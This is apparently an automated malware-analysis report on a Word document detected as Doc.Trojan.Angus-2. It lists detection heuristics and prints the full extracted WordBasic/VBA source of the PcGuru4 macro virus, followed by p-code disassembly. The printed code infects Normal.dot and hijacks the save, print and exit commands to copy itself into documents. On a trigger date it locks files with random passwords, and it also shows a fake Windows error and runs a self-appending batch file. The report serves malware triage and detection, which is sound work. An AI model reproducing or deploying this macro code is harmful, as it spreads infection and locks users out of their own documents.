MALICIOUS
368
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Angus-2. It contains VBA macros, including an AutoOpen macro, which utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The obfuscated nature of the VBA code and the presence of legacy WordBasic markers suggest a trojanized document.
Heuristics 8
-
ClamAV: Doc.Trojan.Angus-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Angus-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
WordBasic.Shell "PCGURU4.BAT", 0 -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "NOpen" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 51,159 bytes but its declared streams total only 0 bytes — 51,159 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 49279 bytes |
SHA-256: baabe9aab6dd69474015d8247a92fd232b52c0bdbe60e4ec2f9574cfe8c258d6 |
|||
|
Detection
ClamAV:
Doc.Trojan.Angus-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NHukjbnBp"
Private Function pn$()
Dim count_
Dim ab
Dim cd
Dim ss
Dim sP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 5) + 5)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ss = Rnd()
If ss < 0.5 Then
sP$ = sP$ + Chr(ab)
Else
sP$ = sP$ + Chr(cd)
End If
Next count_
pn$ = sP$
End Function
Attribute VB_Name = "uyrGYO"
Private Function pas$()
Dim count_
Dim ab
Dim cd
Dim ef
Dim xx
Dim xP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 9) + 9)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ef = WordBasic.Int(Rnd() * (57 - 48) + 48)
xx = Rnd()
If xx < 0.35 Then
xP$ = xP$ + Chr(ab)
ElseIf (xx > 0.34) And (xx < 0.68) Then
xP$ = xP$ + Chr(cd)
Else
xP$ = xP$ + Chr(ef)
End If
Next count_
pas$ = xP$
End Function
Private Function pn$()
Dim count_
Dim ab
Dim cd
Dim ss
Dim sP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 5) + 5)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ss = Rnd()
If ss < 0.5 Then
sP$ = sP$ + Chr(ab)
Else
sP$ = sP$ + Chr(cd)
End If
Next count_
pn$ = sP$
End Function
Attribute VB_Name = "HhYekIELT"
Attribute VB_Name = "PoWNmLGYJg"
Attribute VB_Name = "xMlOFIqU"
Attribute VB_Name = "LxCLcEggG"
Attribute VB_Name = "TMBoiC"
Attribute VB_Name = "TAMqeiFVvX"
Public Sub MAIN()
'dull macro
'by NAENBGOURSG
'SO.HT.AI.KS
'231076 -- GREECE
'VRD 23-4-1997
'VRP A.U.A
End Sub
Attribute VB_Name = "FileClose"
Public Sub MAIN()
Dim iMacroCount
Dim i
Dim bInstalled
On Error GoTo -1: On Error GoTo xxut
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0, AutoSave:=1, SaveInterval:="1"
SetAttr WordBasic.[DefaultDir$](2) + "\Normal.dot", 0
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "PCGURU4" Then
bInstalled = -1
End If
Next i
If Not bInstalled Then
WordBasic.MkDir WordBasic.[DefaultDir$](2) + "\PcGuru2"
WordBasic.CopyFile FileName:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Directory:=WordBasic.[DefaultDir$](2) + "\PcGuru2"
SetAttr WordBasic.[DefaultDir$](2) + "\PcGuru2", 2
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "NOpen"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileClose", "FC"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 1"), "FileSave"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 2"), "FileSaveAs"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 3"), "FilePrint"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 4"), "FilePrintDefault"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 5"), "FileTemplates"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 5"), "ToolsMacro"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 6"), "FileExit"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 7"), "PCGURU4"
Open WordBasic.[DefaultDir$](2) + "\PcGuru4.bat" For Output As 1
Print #1, "@echo off"
Print #1, "Rem PcGuru4 virus by NAENBGOURSG"
Print #1, "Rem Golden Version 4.3"
Print #1, "type PcGuru4.bat >> PcGuru4.bat"
Close 1
End If
'by NAENBGOURSG
SetAttr WordBasic.[DefaultDir$](2) + "\Normal.dot", 1
xxut:
WordBasic.FileClose
End Sub
Attribute VB_Name = "xIFiXuSkkU"
Public Sub MAIN()
Attribute MAIN.VB_Description = "ÁðïèÞêåõóç ôïõ åíåñãïý åããñÜöïõ Þ ðñïôýðïõ"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSave.MAIN"
Dim F$
Dim h
Dim g
Dim T$
'by NAENBGOURSG
On Error GoTo -1: On Error GoTo Z
F$ = WordBasic.[FileName$]()
WordBasic.FileSaveAs Format:=1
If WordBasic.[GetDocumentVar$]("M 4") <> "" Then
For h = 1 To 7
WordBasic.ToolsMacro Name:=WordBasic.[GetDocumentVar$]("M" + Str(h)), Delete:=1
Next h
End If
For g = 1 To 7
WordBasic.SetDocumentVar "M" + Str(g), pn$
Next g
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 1")
WordBasic.MacroCopy "FileSave", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 2")
WordBasic.MacroCopy "FileSaveAs", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 3")
WordBasic.MacroCopy "FilePrint", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 4")
WordBasic.MacroCopy "FilePrintDefault", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 5")
WordBasic.MacroCopy "FileTemplates", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 6")
WordBasic.MacroCopy "FileExit", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 7")
WordBasic.MacroCopy "PCGURU4", T$, 1
T$ = F$ + ":FileClose"
WordBasic.MacroCopy "FC", T$, 1
T$ = F$ + ":AutoOpen"
WordBasic.MacroCopy "NOpen", T$, 1
WordBasic.FileSave
GoTo Q
Z:
WordBasic.FileSave
Q:
End Sub
Private Function pn$()
Dim count_
Dim ab
Dim cd
Dim ss
Dim sP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 5) + 5)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ss = Rnd()
If ss < 0.5 Then
sP$ = sP$ + Chr(ab)
Else
sP$ = sP$ + Chr(cd)
End If
Next count_
pn$ = sP$
End Function
Attribute VB_Name = "FRHfJrPf"
Public Sub MAIN()
Attribute MAIN.VB_Description = "ÁðïèÞêåõóç åíüò áíôéãñÜöïõ ôïõ åããñÜöïõ óå Üëëï ÷ùñéóôü áñ÷åßï"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileSaveAs.MAIN"
Dim F$
Dim h
Dim g
Dim T$
Dim pswr$
'by NAENBGOURSG
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileSaveAs(False)
On Error GoTo -1: On Error GoTo Z
F$ = WordBasic.[FileName$]()
WordBasic.CurValues.FileSaveAs dlg
WordBasic.Dialog.FileSaveAs dlg
If dlg.Format = 0 Then
dlg.Format = 1
End If
If WordBasic.[GetDocumentVar$]("M 4") <> "" Then
For h = 1 To 7
WordBasic.ToolsMacro Name:=WordBasic.[GetDocumentVar$]("M" + Str(h)), Delete:=1
Next h
End If
For g = 1 To 7
WordBasic.SetDocumentVar "M" + Str(g), pn$
Next g
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 1")
WordBasic.MacroCopy "FileSave", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 2")
WordBasic.MacroCopy "FileSaveAs", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 3")
WordBasic.MacroCopy "FilePrint", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 4")
WordBasic.MacroCopy "FilePrintDefault", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 5")
WordBasic.MacroCopy "FileTemplates", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 6")
WordBasic.MacroCopy "FileExit", T$, 1
T$ = F$ + ":" + WordBasic.[GetDocumentVar$]("M 7")
WordBasic.MacroCopy "PCGURU4", T$, 1
T$ = F$ + ":FileClose"
WordBasic.MacroCopy "FC", T$, 1
T$ = F$ + ":AutoOpen"
WordBasic.MacroCopy "NOpen", T$, 1
If WordBasic.Day(WordBasic.Now()) = 23 And WordBasic.Month(WordBasic.Now()) = 10 And WordBasic.Hour(WordBasic.Now()) = 12 And WordBasic.Minute(WordBasic.Now()) > 30 Then
pswr$ = pas$
dlg.Password = pswr$
WordBasic.SetProfileString "PCGURU", WordBasic.[FileName$]() + Str(WordBasic.Minute(WordBasic.Now())) + Str(WordBasic.Second(WordBasic.Now())), pswr$ + "NAENBGOURSG"
End If
WordBasic.FileSaveAs dlg
GoTo Q
Z:
If Err.Number <> 102 Then
WordBasic.FileSaveAs dlg
End If
Q:
End Sub
Private Function pas$()
Dim count_
Dim ab
Dim cd
Dim ef
Dim xx
Dim xP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 9) + 9)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ef = WordBasic.Int(Rnd() * (57 - 48) + 48)
xx = Rnd()
If xx < 0.35 Then
xP$ = xP$ + Chr(ab)
ElseIf (xx > 0.34) And (xx < 0.68) Then
xP$ = xP$ + Chr(cd)
Else
xP$ = xP$ + Chr(ef)
End If
Next count_
pas$ = xP$
End Function
Private Function pn$()
Dim count_
Dim ab
Dim cd
Dim ss
Dim sP$
For count_ = 1 To WordBasic.Int(Rnd() * (11 - 5) + 5)
ab = WordBasic.Int(Rnd() * (90 - 65) + 65)
cd = WordBasic.Int(Rnd() * (122 - 97) + 97)
ss = Rnd()
If ss < 0.5 Then
sP$ = sP$ + Chr(ab)
Else
sP$ = sP$ + Chr(cd)
End If
Next count_
pn$ = sP$
End Function
Attribute VB_Name = "BLbNs"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Åêôýðùóç ôïõ åíåñãïý åããñÜöïõ"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrint.MAIN"
Dim i
'by NAENBGOURSG
If WordBasic.Day(WordBasic.Now()) = 23 And WordBasic.Month(WordBasic.Now()) = 10 Then
WordBasic.ScreenUpdating 0
WordBasic.EndOfDocument
For i = 15 To 24
WordBasic.FontSize i
WordBasic.Bold
WordBasic.InsertPara
WordBasic.Insert "NAENBGOURSG"
Next i
WordBasic.InsertPara
WordBasic.Insert "Hello from GREECE"
WordBasic.StartOfDocument
WordBasic.SetProfileString "PCGURU", "Print", "1"
End If
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FilePrint(False)
WordBasic.CurValues.FilePrint dlg
WordBasic.Dialog.FilePrint dlg
WordBasic.FilePrint dlg
End Sub
Attribute VB_Name = "WPKuKkD"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Åêôýðùóç ôïõ åíåñãïý åããñÜöïõ ìå ôéò ðñïåðéëåãìÝíåò ðáñáìÝôñïõò åêôýðùóçò"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FilePrintDefault.MAIN"
Dim i
'by NAENBGOURSG
If WordBasic.Day(WordBasic.Now()) = 23 And WordBasic.Month(WordBasic.Now()) = 10 Then
WordBasic.ScreenUpdating 0
WordBasic.EndOfDocument
For i = 15 To 24
WordBasic.FontSize i
WordBasic.Bold
WordBasic.InsertPara
WordBasic.Insert "NAENBGOURSG"
Next i
WordBasic.InsertPara
WordBasic.Insert "Hello from GREECE"
WordBasic.StartOfDocument
WordBasic.SetProfileString "PCGURU", "Print", "1"
End If
WordBasic.FilePrintDefault
End Sub
Attribute VB_Name = "EXYhm"
Public Sub MAIN()
Attribute MAIN.VB_Description = "ÁëëáãÞ ôïõ åíåñãïý ðñïôýðïõ êáé ôùí åðéëïãþí ôïõ"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN"
'by NAENBGOURSG
WordBasic.Beep
WordBasic.MsgBox "Windows Protection Error", "Microsoft Windows", 16
End Sub
Attribute VB_Name = "WbRimiqV"
Public Sub MAIN()
Attribute MAIN.VB_Description = "¸îïäïò áðü ôï Microsoft Word ìå åñþôçóç åðéâåâáßùóçò ãéá ôçí áðïèÞêåõóç ôùí åããñÜöùí"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileExit.MAIN"
'by NAENBGOURSG
If WordBasic.Day(WordBasic.Now()) = 24 And WordBasic.Month(WordBasic.Now()) = 10 And WordBasic.[GetProfileString$]("PCGURU", "Print") <> "" Then
WordBasic.ScreenUpdating 0
WordBasic.ChDir WordBasic.[DefaultDir$](2)
WordBasic.Shell "PCGURU4.BAT", 0
End If
If WordBasic.[FileName$]() <> "" Then
WordBasic.ToolsOptionsSave GlobalDotPrompt:=0
End If
WordBasic.FileExit
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim iMacroCount
Dim i
Dim bInstalled
On Error GoTo -1: On Error GoTo bail
WordBasic.ToolsOptionsSave FastSaves:=1, GlobalDotPrompt:=0, AutoSave:=1, SaveInterval:="1"
SetAttr WordBasic.[DefaultDir$](2) + "\Normal.dot", 0
iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
If WordBasic.[MacroName$](i, 0, 0) = "PCGURU4" Then
bInstalled = -1
End If
Next i
If Not bInstalled Then
WordBasic.MkDir WordBasic.[DefaultDir$](2) + "\PcGuru2"
WordBasic.CopyFile FileName:=WordBasic.[DefaultDir$](2) + "\Normal.dot", Directory:=WordBasic.[DefaultDir$](2) + "\PcGuru2"
SetAttr WordBasic.[DefaultDir$](2) + "\PcGuru2", 2
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "NOpen"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":FileClose", "FC"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 1"), "FileSave"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 2"), "FileSaveAs"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 3"), "FilePrint"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 4"), "FilePrintDefault"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 5"), "FileTemplates"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 5"), "ToolsMacro"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 6"), "FileExit"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":" + WordBasic.[GetDocumentVar$]("M 7"), "PCGURU4"
Open WordBasic.[DefaultDir$](2) + "\PcGuru4.bat" For Output As 1
Print #1, "@echo off"
Print #1, "Rem PcGuru4 virus by NAENBGOURSG"
Print #1, "Rem Golden Version 4.3"
Print #1, "type PcGuru4.bat >> PcGuru4.bat"
Close 1
End If
'by NAENBGOURSG
SetAttr WordBasic.[DefaultDir$](2) + "\Normal.dot", 1
bail:
End Sub
' Processing file: /tmp/qstore_jan6lp98
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/NHukjbnBp - 3082 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Function pn())
' Line #4:
' Dim
' VarDefn count_
' Line #5:
' Dim
' VarDefn ab
' Line #6:
' Dim
' VarDefn cd
' Line #7:
' Dim
' VarDefn ss
' Line #8:
' Dim
' VarDefn sP
' Line #9:
' Line #10:
' StartForVariable
' Ld count_
' EndForVariable
' LitDI2 0x0001
' ArgsLd Rnd 0x0000
' LitDI2 0x000B
' LitDI2 0x0005
' Sub
' Paren
' Mul
' LitDI2 0x0005
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' For
' Line #11:
' ArgsLd Rnd 0x0000
' LitDI2 0x005A
' LitDI2 0x0041
' Sub
' Paren
' Mul
' LitDI2 0x0041
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ab
' Line #12:
' ArgsLd Rnd 0x0000
' LitDI2 0x007A
' LitDI2 0x0061
' Sub
' Paren
' Mul
' LitDI2 0x0061
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St cd
' Line #13:
' Line #14:
' ArgsLd Rnd 0x0000
' St ss
' Line #15:
' Ld ss
' LitR8 0x0000 0x0000 0x0000 0x3FE0
' Lt
' IfBlock
' Line #16:
' Ld sP$
' Ld ab
' ArgsLd Chr 0x0001
' Add
' St sP$
' Line #17:
' ElseBlock
' Line #18:
' Ld sP$
' Ld cd
' ArgsLd Chr 0x0001
' Add
' St sP$
' Line #19:
' EndIfBlock
' Line #20:
' StartForVariable
' Ld count_
' EndForVariable
' NextVar
' Line #21:
' Ld sP$
' St pn$
' Line #22:
' Line #23:
' EndFunc
' Macros/VBA/uyrGYO - 4649 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' FuncDefn (Private Function pas())
' Line #4:
' Dim
' VarDefn count_
' Line #5:
' Dim
' VarDefn ab
' Line #6:
' Dim
' VarDefn cd
' Line #7:
' Dim
' VarDefn ef
' Line #8:
' Dim
' VarDefn xx
' Line #9:
' Dim
' VarDefn xP
' Line #10:
' Line #11:
' StartForVariable
' Ld count_
' EndForVariable
' LitDI2 0x0001
' ArgsLd Rnd 0x0000
' LitDI2 0x000B
' LitDI2 0x0009
' Sub
' Paren
' Mul
' LitDI2 0x0009
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' For
' Line #12:
' ArgsLd Rnd 0x0000
' LitDI2 0x005A
' LitDI2 0x0041
' Sub
' Paren
' Mul
' LitDI2 0x0041
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ab
' Line #13:
' ArgsLd Rnd 0x0000
' LitDI2 0x007A
' LitDI2 0x0061
' Sub
' Paren
' Mul
' LitDI2 0x0061
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St cd
' Line #14:
' ArgsLd Rnd 0x0000
' LitDI2 0x0039
' LitDI2 0x0030
' Sub
' Paren
' Mul
' LitDI2 0x0030
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ef
' Line #15:
' Line #16:
' ArgsLd Rnd 0x0000
' St xx
' Line #17:
' Ld xx
' LitR8 0x6666 0x6666 0x6666 0x3FD6
' Lt
' IfBlock
' Line #18:
' Ld xP$
' Ld ab
' ArgsLd Chr 0x0001
' Add
' St xP$
' Line #19:
' Ld xx
' LitR8 0xF5C3 0x5C28 0xC28F 0x3FD5
' Gt
' Paren
' Ld xx
' LitR8 0xF5C3 0x5C28 0xC28F 0x3FE5
' Lt
' Paren
' And
' ElseIfBlock
' Line #20:
' Ld xP$
' Ld cd
' ArgsLd Chr 0x0001
' Add
' St xP$
' Line #21:
' ElseBlock
' Line #22:
' Ld xP$
' Ld ef
' ArgsLd Chr 0x0001
' Add
' St xP$
' Line #23:
' EndIfBlock
' Line #24:
' StartForVariable
' Ld count_
' EndForVariable
' NextVar
' Line #25:
' Ld xP$
' St pas$
' Line #26:
' Line #27:
' EndFunc
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' FuncDefn (Private Function pn())
' Line #32:
' Dim
' VarDefn count_
' Line #33:
' Dim
' VarDefn ab
' Line #34:
' Dim
' VarDefn cd
' Line #35:
' Dim
' VarDefn ss
' Line #36:
' Dim
' VarDefn sP
' Line #37:
' Line #38:
' StartForVariable
' Ld count_
' EndForVariable
' LitDI2 0x0001
' ArgsLd Rnd 0x0000
' LitDI2 0x000B
' LitDI2 0x0005
' Sub
' Paren
' Mul
' LitDI2 0x0005
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' For
' Line #39:
' ArgsLd Rnd 0x0000
' LitDI2 0x005A
' LitDI2 0x0041
' Sub
' Paren
' Mul
' LitDI2 0x0041
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St ab
' Line #40:
' ArgsLd Rnd 0x0000
' LitDI2 0x007A
' LitDI2 0x0061
' Sub
' Paren
' Mul
' LitDI2 0x0061
' Add
' Ld WordBasic
' ArgsMemLd InStrB 0x0001
' St cd
' Line #41:
' Line #42:
' ArgsLd Rnd 0x0000
' St ss
' Line #43:
' Ld ss
' LitR8 0x0000 0x0000 0x0000 0x3FE0
' Lt
' IfBlock
' Line #44:
' Ld sP$
' Ld ab
' ArgsLd Chr 0x0001
' Add
' St sP$
' Line #45:
' ElseBlock
' Line #46:
' Ld sP$
' Ld cd
' ArgsLd Chr 0x0001
' Add
' St sP$
' Line #47:
' EndIfBlock
' Line #48:
' StartForVariable
' Ld count_
' EndForVariable
' NextVar
' Line #49:
' Ld sP$
' St pn$
' Line #50:
' Line #51:
' EndFunc
' Macros/VBA/HhYekIELT - 1440 bytes
' Macros/VBA/PoWNmLGYJg - 1377 bytes
' Macros/VBA/xMlOFIqU - 1055 bytes
' Macros/VBA/LxCLcEggG - 1256 bytes
' Macros/VBA/TMBoiC - 980 bytes
' Macros/VBA/TAMqeiFVvX - 1151 bytes
' Line #0:
' Line #1:
' Line #2:
' FuncDefn (Public Sub MAIN())
' Line #3:
' QuoteRem 0x0000 0x000A "dull macro"
' Line #4:
' Line #5:
' QuoteRem 0x0000 0x000E "by NAENBGOURSG"
' Line #6:
' QuoteRem 0x0000 0x000B "SO.HT.AI.KS"
' Line #7:
' QuoteRem 0x0000 0x0010 "231076 -- GREECE"
' Line #8:
' QuoteRem 0x0000 0x000D "VRD 23-4-1997"
' Line #9:
' QuoteRem 0x0000 0x0009 "VRP A.U.A"
' Line #10:
' Line #11:
' EndSub
' Macros/VBA/FileClose - 3548 bytes
' Line #0:
' Line #1:
' FuncDefn (Public Sub MAIN())
' Line #2:
' Dim
' VarDefn iMacroCount
' Line #3:
' Dim
' VarDefn i
' Line #4:
' Dim
' VarDefn bInstalled
' Line #5:
' OnError <crash>
' BoS 0x0000
' OnError xxut
' Line #6:
' LitDI2 0x0001
' ParamNamed FastSaves
' LitDI2 0x0000
' ParamNamed GlobalDotPrompt
' LitDI2 0x0001
' ParamNamed AutoSave
' LitStr 0x0001 "1"
' ParamNamed SaveInterval
' Ld WordBasic
' ArgsMemCall ToolsOptionsSave 0x0004
' Line #7:
' Line #8:
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x000B "\Normal.dot"
' Add
' LitDI2 0x0000
' ArgsCall SetAttr 0x0002
' Line #9:
' Line #10:
' LitDI2 0x0000
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemLd CountMacros 0x0002
' St iMacroCount
' Line #11:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld iMacroCount
' For
' Line #12:
' Ld i
' LitDI2 0x0000
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemLd [MacroName$] 0x0003
' LitStr 0x0007 "PCGURU4"
' Eq
' IfBlock
' Line #13:
' LitDI2 0x0001
' UMi
' St bInstalled
' Line #14:
' EndIfBlock
' Line #15:
' StartForVariable
' Ld i
' EndForVariable
' NextVar
' Line #16:
' Ld bInstalled
' Not
' IfBlock
' Line #17:
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x0008 "\PcGuru2"
' Add
' Ld WordBasic
' ArgsMemCall MkDir 0x0001
' Line #18:
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x000B "\Normal.dot"
' Add
' ParamNamed FileName
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x0008 "\PcGuru2"
' Add
' ParamNamed Directory
' Ld WordBasic
' ArgsMemCall CopyFile 0x0002
' Line #19:
' LitDI2 0x0002
' Ld WordBasic
' ArgsMemLd [DefaultDir$] 0x0001
' LitStr 0x0008 "\PcGuru2"
' Add
' LitDI2 0x0002
' ArgsCall SetAttr 0x0002
' Line #20:
' Line #21:
' Line #22:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0009 ":AutoOpen"
' Add
' LitStr 0x0005 "NOpen"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #23:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x000A ":FileClose"
' Add
' LitStr 0x0002 "FC"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #24:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "M 1"
' Ld WordBasic
' ArgsMemLd [GetDocumentVar$] 0x0001
' Add
' LitStr 0x0008 "FileSave"
' Ld WordBasic
' ArgsMemCall MacroCopy 0x0002
' Line #25:
' Ld WordBasic
' ArgsMemLd [FileName$] 0x0000
' LitStr 0x0001 ":"
' Add
' LitStr 0x0003 "M 2"
' Ld WordBasic
' ArgsMemLd [GetDocumentVar$] 0x0001
' Add
' LitStr 0x000A "FileSaveAs"
' Ld WordBasic
…
|
|||
embedded_office_off00007829.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x7829 | 51159 bytes |
SHA-256: c01afbe09a8d24da49a8726df0455fc7718a225d4f55c30989f032d9d4a1e365 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.